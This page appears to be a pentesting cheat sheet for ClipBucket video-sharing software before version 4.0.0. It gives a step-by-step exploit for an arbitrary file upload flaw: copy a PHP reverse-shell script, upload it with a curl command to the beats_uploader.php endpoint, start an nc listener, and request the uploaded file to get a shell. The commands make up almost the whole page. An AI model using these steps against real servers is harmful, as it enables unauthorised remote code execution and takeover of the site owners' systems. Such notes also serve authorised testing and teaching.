# ClipBucket Pentesting

ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone).

### Arbitrary File Upload < v4.0.0 <a href="#arbitrary-file-upload-v400" id="arbitrary-file-upload-v400"></a>

ClipBucket versions before 4.0.0 is vulnerable to file upload in ‘uploader’ actions. We can upload arbitrary files so we can execute reverse shell.

#### 1. Prepare Payload <a href="#id-1-prepare-payload" id="id-1-prepare-payload"></a>

Create a PHP script to reverse shell in local machine.

```shellscript
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
```

Update $ip and $port with your local ip address and port.

#### 2. Upload the Payload <a href="#id-2-upload-the-payload" id="id-2-upload-the-payload"></a>

Next upload the above PHP script to the target website.

```shellscript
curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php"
```

#### 3. Reverse Shell <a href="#id-3-reverse-shell" id="id-3-reverse-shell"></a>

In local machine, start a listener.

```shellscript
nc -lvnp 4444
```

Then access to **`https://example.com/actions/CB_BEATS_UPLOAD_DIR/<uploaded_filename>.php`**.\
We should get a shell.